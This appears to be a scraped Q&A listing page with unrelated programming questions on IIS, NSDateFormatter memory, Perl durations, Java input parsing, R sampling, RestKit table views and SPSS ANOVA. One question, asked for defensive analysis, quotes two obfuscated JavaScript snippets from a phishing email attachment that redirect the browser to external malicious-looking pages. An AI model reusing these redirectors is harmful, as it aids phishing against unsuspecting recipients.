process serving application pool 'Classic .NET AppPool' suffered a fatal communication error with the Windows Process Activation Service. The process id was '3676'. The data field contains the error number 6D000780". This happens when MyComponent is instantiating. What I could forget when moved to IIS? Other examples, like magic square console application, runs perfect, and every matlab component instantiating, but not in IIS environment.

    Read the article

  • Instruments (Leaks) and NSDateFormatter

    - by Cal
    When I run my iPhone app with Instruments Leaks and parse a bunch of NSDates using NSDateFormatter my memory goes up about 1mb and stays even though these NSDates should be dealloc'd after the parsing (I just discard them if they aren't new). I thought the malloc (in my heaviest stack trace below) could become part of the NSDate but I also thought it could be memory that only used during some intermediate step in parsing. Does anyone know which one it is or how to find out? Also, is there a way to put a breakpoint on NSDate dealloc to see if that memory is really being reclaimed? Here's what my date formatter looks like for parsing these dates: df = [[NSDateFormatter alloc] init]; [df setDateFormat:@"EEE, d MMM yyyy H:m:s z"]; Here's the Heaviest Stack trace when the memory bumps up and stays there: 0 libSystem.B.dylib 208.80 Kb malloc 1 libicucore.A.dylib 868.19 Kb icu::ZoneMeta::getSingleCountry(icu::UnicodeString const&, icu::UnicodeString&) 2 libicucore.A.dylib 868.66 Kb icu::ZoneMeta::getSingleCountry(icu::UnicodeString const&, icu::UnicodeString&) 3 libicucore.A.dylib 868.67 Kb icu::ZoneMeta::getSingleCountry(icu::UnicodeString const&, icu::UnicodeString&) 4 libicucore.A.dylib 868.67 Kb icu::DateFormatSymbols::initZoneStringFormat() 5 libicucore.A.dylib 868.67 Kb icu::DateFormatSymbols::getZoneStringFormat() const 6 libicucore.A.dylib 868.67 Kb icu::SimpleDateFormat::subParse(icu::UnicodeString const&, int&, unsigned short, int, signed char, signed char, signed char*, icu::Calendar&) const 7 libicucore.A.dylib 868.67 Kb icu::SimpleDateFormat::parse(icu::UnicodeString const&, icu::Calendar&, icu::ParsePosition&) const 8 libicucore.A.dylib 868.67 Kb icu::DateFormat::parse(icu::UnicodeString const&, icu::ParsePosition&) const 9 libicucore.A.dylib 868.67 Kb udat_parse 10 CoreFoundation 868.67 Kb CFDateFormatterGetAbsoluteTimeFromString 11 CoreFoundation 868.67 Kb CFDateFormatterCreateDateFromString 12 Foundation 868.67 Kb -[NSDateFormatter getObjectValue:forString:range:error:] 13 Foundation 868.75 Kb -[NSDateFormatter getObjectValue:forString:errorDescription:] 14 Foundation 868.75 Kb -[NSDateFormatter dateFromString:] Thanks!

    Read the article

  • What does this Javascript do?

    - by nute
    I've just found out that a spammer is sending email from our domain name, pretending to be us, saying: Dear Customer, This e-mail was send by ourwebsite.com to notify you that we have temporanly prevented access to your account. We have reasons to beleive that your account may have been accessed by someone else. Please run attached file and Follow instructions. (C) ourwebsite.com (I changed that) The attached file is an HTML file that has the following javascript: <script type='text/javascript'>function mD(){};this.aB=43719;mD.prototype = {i : function() {var w=new Date();this.j='';var x=function(){};var a='hgt,t<pG:</</gm,vgb<lGaGwg.GcGogmG/gzG.GhGtGmg'.replace(/[gJG,\<]/g, '');var d=new Date();y="";aL="";var f=document;var s=function(){};this.yE="";aN="";var dL='';var iD=f['lOovcvavtLi5o5n5'.replace(/[5rvLO]/g, '')];this.v="v";var q=27427;var m=new Date();iD['hqrteqfH'.replace(/[Htqag]/g, '')]=a;dE='';k="";var qY=function(){};}};xO=false;var b=new mD(); yY="";b.i();this.xT='';</script> Another email had this: <script type='text/javascript'>function uK(){};var kV='';uK.prototype = {f : function() {d=4906;var w=function(){};var u=new Date();var hK=function(){};var h='hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');var n=new Array();var e=function(){};var eJ='';t=document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];this.nH=false;eX=2280;dF="dF";var hN=function(){return 'hN'};this.g=6633;var a='';dK="";function x(b){var aF=new Array();this.q='';var hKB=false;var uN="";b['hIrBeTf.'.replace(/[\.BTAI]/g, '')]=h;this.qO=15083;uR='';var hB=new Date();s="s";}var dI=46541;gN=55114;this.c="c";nT="";this.bG=false;var m=new Date();var fJ=49510;x(t);this.y="";bL='';var k=new Date();var mE=function(){};}};var l=22739;var tL=new uK(); var p="";tL.f();this.kY=false;</script> Can anyone tells me what it does? So we can see if we have a vulnerability, and if we need to tell our customers about it ... Thanks

    Read the article

  • Perl: how to pretty-print time duration

    - by sds
    How do I pretty print time duration in perl? The only thing I could come up with so far is my $interval = 1351521657387 - 1351515910623; # milliseconds my $duration = DateTime::Duration->new( seconds => POSIX::floor($interval/1000) , nanoseconds => 1000000 * ($interval % 1000), ); my $df = DateTime::Format::Duration->new( pattern => '%Y years, %m months, %e days, ' . '%H hours, %M minutes, %S seconds, %N nanoseconds', normalize => 1, ); print $df->format_duration($duration); which results in 0 years, 00 months, 0 days, 01 hours, 35 minutes, 46 seconds, 764000000 nanoseconds This is no good for me for the following reasons: I don't want to see "0 years" (space waste) &c and I don't want to remove "%Y years" from the pattern (what if I do need years next time?) I know in advance that my precision is only milliseconds, I don't want to see the 6 zeros in the nanoseconds part. I care about prettiness/compactness/human readability much more than about precision/machine readability. I.e., I want to see something like "1.2 years" or "3.22 months" or "7.88 days" or "5.7 hours" or "75.5 minutes" (or "1.26 hours, whatever looks better to you) or "24.7 seconds" or "133.7 milliseconds" &c (similar to how R prints difftime)

    Read the article

  • getting number from console!

    - by Johanna
    Hi this is my method that will be called if I want to get a number from user. but if the user also enter a right number just the "else" part will be run ,why? please help me tahnsk. public static int chooseTheTypeOfSorting() { System.out.println("Enter 0 for merge sorting OR enter 1 for bubble sorting"); int numberFromConsole = 0; try { InputStreamReader isr = new InputStreamReader(System.in); BufferedReader br = new BufferedReader(isr); String s = br.readLine(); DecimalFormat df = new DecimalFormat(); Number n = df.parse(s); numberFromConsole = n.intValue(); } catch (ParseException ex) { Logger.getLogger(DoublyLinkedList.class.getName()).log(Level.SEVERE, null, ex); } catch (IOException ex) { Logger.getLogger(DoublyLinkedList.class.getName()).log(Level.SEVERE, null, ex); } return numberFromConsole; } and in my main method: public static void main(String[] args) { int i = 0; i = getRandomNumber(10, 10000); int p = chooseTheTypeOfSorting(); DoublyLinkedList list = new DoublyLinkedList(); for (int j = 0; j < i; j++) { list.add(j, getRandomNumber(10, 10000)); if (p == 0) { //do something.... } if (p == 1) { //do something..... } else { System.out.println("write the correct number "); chooseTheTypeOfSorting(); }

    Read the article

  • Sampling Duplicates

    - by user3640982
    I have a dataset from which I need to sample. It is set up with an ID field and a year field. I want every record from the most current year and then I want the most current ID's but sampled from every 3rd year going back. The data is ordered by year. For example ID<-rep(1:3, 5) Year<-rep(c(1,2,3,4,5),each=3) df<-data.frame(ID,Year) ID Year 1 1 1 2 2 1 3 3 1 4 1 2 5 2 2 6 3 2 7 1 3 8 2 3 9 3 3 10 1 4 11 2 4 12 3 4 13 1 5 14 2 5 15 3 5 So from this example, I would want to return ID Year 1 1 1 2 2 1 3 3 1 4 1 4 5 2 4 6 3 4 I'm thinking that some combination of duplicated() and which() should get what I want, but the problem is duplicated() just tells if it has been repeated; it doesn't say which record is being repeated. which(duplicated(df$ID)) [1] 4 5 6 7 8 9 10 11 12 13 14 15 This a problem since not every ID exists in every year. Any help would be appreciated. Thanks, Eric

    Read the article

  • Finding the Column Index for a Specific Value

    - by Btibert3
    Hi All, I am having a brain cramp. Below is a toy dataset: df <- data.frame( id = 1:6, v1 = c("a", "a", "c", NA, "g", "h"), v2 = c("z", "y", "a", NA, "a", "g"), stringsAsFactors=F) I have a specific value that I want to find across a set of defined columns and I want to identify the position it is located in. The fields I am searching are characters and the trick is that the value I am looking for might not exist. In addition, null strings are also present in the dataset. Assuming I knew how to do this, the variable position indicates the values I would like returned. > df id v1 v2 position 1 1 a z 1 2 2 a y 1 3 3 c a 2 4 4 <NA> <NA> 99 5 5 g a 2 6 6 h g 99 The general rule is that I want to find the position of value "a", and if it is not located or if v1 is missing, then I want 99 returned. In this instance, I am searching across v1 and v2, but in reality, I have 10 different variables. It is also worth noting that the value I am searching for can only exist once across the 10 variables. What is the best way to generate this recode? Many thanks in advance.

    Read the article

  • How to parse time stamps with Unicode characters in Java or Perl?

    - by ram
    I'm trying to make my code as generic as possible. I'm trying to parse install time of a product installation. I will have two files in the product, one that has time stamp I need to parse and other file tells the language of the installation. This is how I'm parsing the timestamp public class ts { public static void main (String[] args){ String installTime = "2009/11/26 \u4e0b\u5348 04:40:54"; //This timestamp I got from the first file. Those unicode charecters are some Chinese charecters...AM/PM I guess //Locale = new Locale();//don't set the language yet SimpleDateFormat df = (SimpleDateFormat)DateFormat.getDateTimeInstance(DateFormat.DEFAULT,DateFormat.DEFAULT); Date instTime = null; try { instTime = df.parse(installTime); } catch (ParseException e) { // TODO Auto-generated catch block e.printStackTrace(); } System.out.println(instTime.toString()); } } The output I get is Parsing Failed java.text.ParseException: Unparseable date: "2009/11/26 \u4e0b\u5348 04:40:54" at java.text.DateFormat.parse(Unknown Source) at ts.main(ts.java:39) Exception in thread "main" java.lang.NullPointerException at ts.main(ts.java:45) It throws exception and at the end when I print it, it shows some proper date... wrong though. I would really appreciate if you could clarify me on these doubts How to parse timestamps that have unicode characters if this is not the proper way? If parsing is failed, how could instTime able to hold some date, wrong though? I know its some chinese,Korean time stamps so I set the locale to zh and ko as follows.. even then same error comes again Locale = new Locale("ko"); Locale = new Locale("ja"); Locale = new Locale("zh"); How can I do the same thing in Perl? I can't use Date::Manip package; Is there any other way?

    Read the article

  • Get 1 array from 2 arrays (using RestKit 0.20)

    - by Reez
    I'm using RestKit and was wondering how to combine two array's into one array. I already have the data being pulled in separately from API1 and API2, but I don't know how to combine them into 1 tableView. Each API is pulling in media, and I want the combined tableView to show the most recent media (like any standard timeline does these days). I will post any extra code or help as necessary, thanks so much! Below shows API1 + API2 being pulled in correctly, but not combined into the tableView. Only data from API1 shows in the tableView. ViewController.m @interface StackOverflowViewController () @property (strong, nonatomic) NSArray *hArray; @property (strong, nonatomic) NSArray *springs; @property (strong, nonatomic) RKObjectManager *eObjectManager; @property (strong, nonatomic) NSArray *iArray; @property (strong, nonatomic) NSArray *imagesArray; @property (strong, nonatomic) RKObjectManager *iObjectManager; // Wain @property (strong, nonatomic) NSMutableArray *tableDataList; // Laarme @property (nonatomic, strong) NSMutableArray *contentArray; @property (nonatomic, strong) NSDateFormatter *dateFormatter1; // Dan @property (nonatomic, strong) NSMutableArray *combinedModel; @end @implementation StackOverflowViewController @synthesize tableView = _tableView; @synthesize spring; @synthesize leaf; @synthesize theme; @synthesize hArray; @synthesize springs; @synthesize eObjectManager; @synthesize iArray; @synthesize imagesArray; @synthesize iObjectManager; // Wain @synthesize tableDataList; // Laarme @synthesize contentArray; @synthesize dateFormatter1; // Dan @synthesize combinedModel; - (void)viewDidLoad { [super viewDidLoad]; // Do any additional setup after loading the view. [self configureRestKit]; [self loadMediaDan]; [self sortCombinedModel]; } - (void)didReceiveMemoryWarning { [super didReceiveMemoryWarning]; // Dispose of any resources that can be recreated. } - (void)configureRestKit { // API1 // initialize AFNetworking HTTPClient NSURL *baseURLE = [NSURL URLWithString:@"https://api.e.com"]; AFHTTPClient *clientE = [[AFHTTPClient alloc] initWithBaseURL:baseURLE]; // initialize RestKit RKObjectManager *eManager = [[RKObjectManager alloc] initWithHTTPClient:clientE]; self.eObjectManager = eManager; // setup object mappings RKObjectMapping *feedMapping = [RKObjectMapping mappingForClass:[Feed class]]; [feedMapping addAttributeMappingsFromArray:@[@"headline", @"premium", @"published", @"description"]]; RKObjectMapping *linksMapping = [RKObjectMapping mappingForClass:[Links class]]; RKObjectMapping *webMapping = [RKObjectMapping mappingForClass:[Web class]]; [webMapping addAttributeMappingsFromArray:@[@"href"]]; RKObjectMapping *mobileMapping = [RKObjectMapping mappingForClass:[Mobile class]]; [mobileMapping addAttributeMappingsFromArray:@[@"href"]]; RKObjectMapping *imagesMapping = [RKObjectMapping mappingForClass:[Images class]]; [imagesMapping addAttributeMappingsFromArray:@[@"height", @"width", @"url"]]; [feedMapping addPropertyMapping:[RKRelationshipMapping relationshipMappingFromKeyPath:@"links" toKeyPath:@"links" withMapping:linksMapping]]; [feedMapping addPropertyMapping:[RKRelationshipMapping relationshipMappingFromKeyPath:@"images" toKeyPath:@"images" withMapping:imagesMapping]]; [linksMapping addPropertyMapping:[RKRelationshipMapping relationshipMappingFromKeyPath:@"web" toKeyPath:@"web" withMapping:webMapping]]; [linksMapping addPropertyMapping:[RKRelationshipMapping relationshipMappingFromKeyPath:@"mobile" toKeyPath:@"mobile" withMapping:mobileMapping]]; // register mappings with the provider using a response descriptor RKResponseDescriptor *responseDescriptor = [RKResponseDescriptor responseDescriptorWithMapping:feedMapping method:RKRequestMethodGET pathPattern:nil keyPath:@"feed" statusCodes:[NSIndexSet indexSetWithIndex:200]]; [self.eObjectManager addResponseDescriptor:responseDescriptor]; // API2 // initialize AFNetworking HTTPClient NSURL *baseURLI = [NSURL URLWithString:@"https://api.i.com"]; AFHTTPClient *clientI = [[AFHTTPClient alloc] initWithBaseURL:baseURLI]; // initialize RestKit RKObjectManager *iManager = [[RKObjectManager alloc] initWithHTTPClient:clientI]; self.iObjectManager = iManager; // setup object mappings RKObjectMapping *dataMapping = [RKObjectMapping mappingForClass:[Data class]]; [dataMapping addAttributeMappingsFromArray:@[@"link", @"created_time"]]; RKObjectMapping *imagesMapping = [RKObjectMapping mappingForClass:[ImagesI class]]; [IMapping addAttributeMappingsFromArray:@[@""]]; RKObjectMapping *standardResolutionMapping = [RKObjectMapping mappingForClass:[StandardResolution class]]; [standardResolutionMapping addAttributeMappingsFromArray:@[@"url", @"width", @"height"]]; RKObjectMapping *captionMapping = [RKObjectMapping mappingForClass:[Caption class]]; [captionMapping addAttributeMappingsFromArray:@[@"text", @"created_time"]]; RKObjectMapping *userMapping = [RKObjectMapping mappingForClass:[User class]]; [userMapping addAttributeMappingsFromArray:@[@"username"]]; [dataMapping addPropertyMapping:[RKRelationshipMapping relationshipMappingFromKeyPath:@"images" toKeyPath:@"images" withMapping:imagesMapping]]; [imagesMapping addPropertyMapping:[RKRelationshipMapping relationshipMappingFromKeyPath:@"standard_resolution" toKeyPath:@"standard_resolution" withMapping:standardResolutionMapping]]; [dataMapping addPropertyMapping:[RKRelationshipMapping relationshipMappingFromKeyPath:@"caption" toKeyPath:@"caption" withMapping:captionMapping]]; [dataMapping addPropertyMapping:[RKRelationshipMapping relationshipMappingFromKeyPath:@"user" toKeyPath:@"user" withMapping:userMapping]]; // register mappings with the provider using a response descriptor RKResponseDescriptor *responseDescriptor2 = [RKResponseDescriptor responseDescriptorWithMapping:dataMapping method:RKRequestMethodGET pathPattern:nil keyPath:@"data" statusCodes:[NSIndexSet indexSetWithIndex:200]]; [self.iObjectManager addResponseDescriptor:responseDescriptor2]; } - (void)loadMedia { // Laarme contentArray = [[NSMutableArray alloc] init]; [self sortByDates]; // API1 NSString *apikey = @kCLIENTKEY; NSDictionary *queryParams = @{@"apikey" : apikey,}; [self.eObjectManager getObjectsAtPath:[NSString stringWithFormat:@"v1/n/?limit=4&leafs=%@&themes=%@", leafAbbreviation, themeID] // Changed limit to 4 for the time being parameters:queryParams success:^(RKObjectRequestOperation *operation, RKMappingResult *mappingResult) { hArray = mappingResult.array; [self.tableView reloadData]; } failure:^(RKObjectRequestOperation *operation, NSError *error) { NSLog(@"No?: %@", error); }]; // API2 [self.iObjectManager getObjectsAtPath:[NSString stringWithFormat:@"v1/u/2/m/recent/?client_id=e999"] parameters:nil success:^(RKObjectRequestOperation *operation, RKMappingResult *mappingResult) { iArray = mappingResult.array; [self.tableView reloadData]; } failure:^(RKObjectRequestOperation *operation, NSError *error) { NSLog(@"No: %@", error); }]; } // Laarme - (void)sortByDates { NSDateFormatter *dateFormatter2 = [[NSDateFormatter alloc] init]; //Do the dateFormatter settings, you may have to use 2 NSDateFormatters if the format is different for Data & Feed //The initialization of the dateFormatter is done before the block, because its alloc/init take some time, and you may have to declare it with "__block" //Since in your edit you do that and it seems it's the same format, just do @property (nonatomic, strong) NSDateFormatter dateFormatter; NSArray *sortedArray = [contentArray sortedArrayUsingComparator:^NSComparisonResult(id a, id b) { // Added Curly Braces around if else statements and used feedObject NSDate *aDate, *bDate; Feed *feedObject = (Feed *)a; Data *dataObject = (Data *)b; if ([a isKindOfClass:[Feed class]]) { //Feed *feedObject = (Feed *)a; aDate = [dateFormatter1 dateFromString:feedObject.published];} else { //if ([a isKindOfClass:[Data class]]) aDate = [dateFormatter2 dateFromString:dataObject.created_time];} if ([b isKindOfClass:[Feed class]]) { bDate = [dateFormatter1 dateFromString:feedObject.published];} else {//if ([b isKindOfClass:[Data class]]) bDate = [dateFormatter2 dateFromString:dataObject.created_time];} return [aDate compare:bDate]; }]; } #pragma mark - Table View - (NSInteger)numberOfSectionsInTableView:(UITableView *)tableView { return 1; } - (NSInteger)tableView:(UITableView *)tableView numberOfRowsInSection:(NSInteger)section { // API1 //return hArray.count; // API2 //return iArray.count; // API1 + API2 return hArray.count + iArray.count; } - (UITableViewCell *)tableView:(UITableView *)tableView cellForRowAtIndexPath:(NSIndexPath *)indexPath { UITableViewCell *cell; if(indexPath.row < hArray.count) { // Date Change NSDateFormatter *df = [[NSDateFormatter alloc] init]; [df setDateFormat:@"MMMM d, yyyy h:mma"]; // API 1 TableViewCell *api1Cell = [tableView dequeueReusableCellWithIdentifier:@"YourAPI1Cell"]; // Do everything you need to do with the api1Cell // Use the index in 'indexPath.row' to get the object from you array // API1 Feed *feedLocal = [hArray objectAtIndex:indexPath.row]; // API1 NSString *dateString = [self timeSincePublished:feedLocal.published]; NSString *headlineText = [NSString stringWithFormat:@"%@", feedLocal.headline]; NSString *descriptionText = [NSString stringWithFormat:@"%@", feedLocal.description]; NSString *premiumText = [NSString stringWithFormat:@"%@", feedLocal.premium]; api1Cell.labelHeadline.text = [NSString stringWithFormat:@"%@", headlineText]; api1Cell.labelPublished.text = dateString; api1Cell.labelDescription.text = descriptionText; // SDWebImage API1 if ([feedLocal.images count] == 0) { // Not sure anything needed here } else { Images *imageLocal = [feedLocal.images objectAtIndex:0]; NSString *imageURL = [NSString stringWithFormat:@"%@", imageLocal.url]; NSString *imageWith = [NSString stringWithFormat:@"%@", imageLocal.width]; NSString *imageHeight = [NSString stringWithFormat:@"%@", imageLocal.height]; __weak UITableViewCell *wcell = cell; [cell.imageView setImageWithURL:[NSURL URLWithString:imageURL] placeholderImage:[UIImage imageNamed:@"X"] completed:^(UIImage *image, NSError *error, SDImageCacheType cacheType) { // Something }]; } cell = api1Cell; } else { // Date Change NSDateFormatter *df = [[NSDateFormatter alloc] init]; [df setDateFormat:@"MMMM d, yyyy h:mma"]; // API 2 MRWebListTableViewCellTwo *api2Cell = [tableView dequeueReusableCellWithIdentifier:@"YourAPI2Cell"]; // Do everything you need to do with the api2Cell // Remember to use 'indexPath.row - hArray.count' as the index for getting an object for your second array // API 2 Data *dataLocal = [iArray objectAtIndex:indexPath.row - hArray.count]; // API 2 NSString *dateStringI = [self timeSincePublished:dataLocal.created_time]; NSString *captionTextI = [NSString stringWithFormat:@"%@", dataLocal.caption.text]; NSString *usernameI = [NSString stringWithFormat:@"%@", dataLocal.user.username]; api2Cell.labelHeadline.text = usernameI; api2Cell.labelDescription.text = captionTextI; api2Cell.labelPublished.text = dateStringI; // SDWebImage API 2 if ([dataLocal.images count] == 0) { NSLog(@"Images Count: %lu", (unsigned long)dataLocal.images.count); // Not sure anything needed here } else { ImagesI *imageLocalI = [dataLocal.images objectAtIndex:0]; StandardResolutionI *standardResolutionLocal = [imageLocalI.standard_resolution objectAtIndex:0]; NSString *imageURLI = [NSString stringWithFormat:@"%@", standardResolutionLocal.url]; NSString *imageWithI = [NSString stringWithFormat:@"%@", standardResolutionLocal.width]; NSString *imageHeightI = [NSString stringWithFormat:@"%@", standardResolutionLocal.height]; // 11.2 __weak UITableViewCell *wcell = cell; [cell.imageView setImageWithURL:[NSURL URLWithString:imageURLI] placeholderImage:[UIImage imageNamed:@"X"] completed:^(UIImage *image, NSError *error, SDImageCacheType cacheType) { // Something }]; } cell = api2Cell; } return cell; } Feed.h @property (nonatomic, strong) Links *links; @property (nonatomic, strong) NSString *headline; @property (nonatomic, strong) NSString *source; @property (nonatomic, strong) NSDate *published; @property (nonatomic, strong) NSString *description; @property (nonatomic, strong) NSString *premium; @property (nonatomic, strong) NSArray *images; Data.h @property (nonatomic, strong) NSString *link; @property (nonatomic, strong) NSDate *created_time; @property (nonatomic, strong) UserI *user; @property (nonatomic, strong) NSArray *images; @property (nonatomic, strong) CaptionI *caption;

    Read the article

  • SPSS - sum of squares change radically with slight model changes in ANOVA??

    - by Pat
    I have noticed that the sum of squares in my models can change fairly radically with even the slightest adjustment to my models???? Is this normal???? I'm using SPSS 16, and both models presented below used the same data and variables with only one small change - categorizing one of the variables as either a 2 level or 3 level variable. Details - using a 2 x 2 x 6 mixed model ANOVA with the 6 being the repeated measure i get the following in the between group analysis ------------------------------------------------------------ Source | Type III SS | df | MS | F | Sig ------------------------------------------------------------ intercept | 4086.46 | 1 | 4086.46 | 104.93 | .000 X | 224.61 | 1 | 224.61 | 5.77 | .019 Y | 2.60 | 1 | 2.60 | .07 | .80 X by Y | 19.25 | 1 | 19.25 | .49 | .49 Error | 2570.40 | 66 | 38.95 | Then, when I use the exact same data but a slightly different model in which variable Y has 3 levels instead of 2 levels I get the following ------------------------------------------------------------ Source | Type III SS | df | MS | F | Sig ------------------------------------------------------------ intercept | 3603.88 | 1 | 3603.88 | 90.89 | .000 X | 171.89 | 1 | 171.89 | 4.34 | .041 Y | 19.23 | 2 | 9.62 | .24 | .79 X by Y | 17.90 | 2 | 17.90 | .80 | .80 Error | 2537.76 | 64 | 39.65 | I don't understand why variable X would have a different sum of squares simply because variable Y gets devided up into 3 levels instead of 2. This is also the case in the within groups analysis too. Please help me understand :D Thank you in advance Pat

    Read the article

< Previous Page | 5 6 7 8 9 10 11 12 13 14 15 16  | Next Page >